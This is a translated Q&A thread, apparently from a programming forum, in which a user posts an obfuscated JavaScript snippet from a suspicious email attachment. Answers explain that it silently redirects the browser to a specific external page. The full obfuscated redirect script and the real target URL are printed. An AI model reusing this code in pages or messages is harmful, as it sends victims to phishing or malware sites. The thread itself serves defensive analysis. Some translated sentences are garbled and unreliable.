Mã lừa đảo đáng ngờ này làm gì?

Question

Một vài đồng nghiệp không phải CNTT của tôi đã mở tệp đính kèm .html trong một email có vẻ cực kỳ đáng ngờ. Nó dẫn đến một màn hình trống khi nó xuất hiện một số mã javascript đã được chạy.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

Nó đã làm gì? Nó nằm ngoài phạm vi kiến ​​thức lập trình của tôi.

Answer 1

Nó sẽ chuyển hướng đến một url, 'http://lendermedia.com/images/z.htm' (tự theo dõi rủi ro của chính bạn).

Sao chép và dán mã vào trình chỉnh sửa JavaScript xứng đáng và định dạng mã nguồn cho bạn.

Những điểm mấu chốt:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, ''); 

h sẽ bằng 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 

t sẽ chứa một tham chiếu đến document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 

Khu nghỉ dưỡng mang tên href của b, tại thời điểm này (bên trong một hàm khác) thực sự là t từ câu lệnh trên, được đặt thành h, là url.

Hầu hết các mã là chỉ tiếng ồn, các chức năng thực tế bao gồm này:

function uK() { 
}; 
uK.prototype = { 
    f : function() { 
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' 
     .replace(/[\^H\!9X]/g, ''); 
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 
    function x(b) { 
     b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 
    } 
    x(t); 
    } 
}; 
var tL = new uK(); 
tL.f(); 

Answer 2

Trừ obfuscation, nó làm điều gì đó như document.location.href="http://lendermedia.com/images/z.htm"

Answer 3

phần chính để hiểu mã mà là replace(/[\^H\!9X]/g, '') các bộ phận. nếu đối số thứ 2 cho thay thế là '', thì nó chỉ loại bỏ thứ từ chuỗi trước đó.

Cách thực sự không phù hợp để làm xáo trộn mọi thứ. Có lẽ mục tiêu chỉ là ngẫu nhiên cho mỗi người dùng và tránh các bộ lọc spam Bayes.

Answer 4

Tôi gặp sự cố tương tự và sau đó tìm thấy trang này. Sau khi thực hiện WHOIS cho thông tin liên hệ, tôi đã liên hệ với chủ sở hữu của lendermedia.com, dường như vừa phát hiện ra rằng trang web của anh ấy đang lưu trữ trang z.htm với kiến ​​thức của anh ấy và trái với mong muốn của anh ấy. Vào thời điểm tôi liên lạc với anh ta, tôi có thể duyệt qua thư mục /images/ của anh ấy. Từ đó anh ta đã thay đổi quyền. Tất cả điều này để nói rằng nó xuất hiện anh chàng này là sạch sẽ, nhưng đó là để bạn có thể quyết định.